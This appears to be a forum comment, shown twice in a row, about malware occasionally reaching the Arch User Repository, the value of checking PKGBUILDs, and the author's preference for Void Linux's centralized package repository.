Agreed. There has been cases of malware sneaking its way into the AUR.
Now it could be avoided by checking PKGBUILDs and I can trust that the reader is checking those (are you, reader? 🤨). But do you have that trust for every user?
I prefer Void Linux’s way of handling packages, where it all goes through one ultimately trusted git repo that gets packaged up if the license allows it, otherwise using xbps-src. If it was a bit less DIY compared to Arch I’d be hopping onto it tbh.
Mixed bag
Agreed. There has been cases of malware sneaking its way into the AUR.
Now it could be avoided by checking PKGBUILDs and I can trust that the reader is checking those (are you, reader? 🤨). But do you have that trust for every user?
I prefer Void Linux’s way of handling packages, where it all goes through one ultimately trusted git repo that gets packaged up if the license allows it, otherwise using
xbps-src. If it was a bit less DIY compared to Arch I’d be hopping onto it tbh.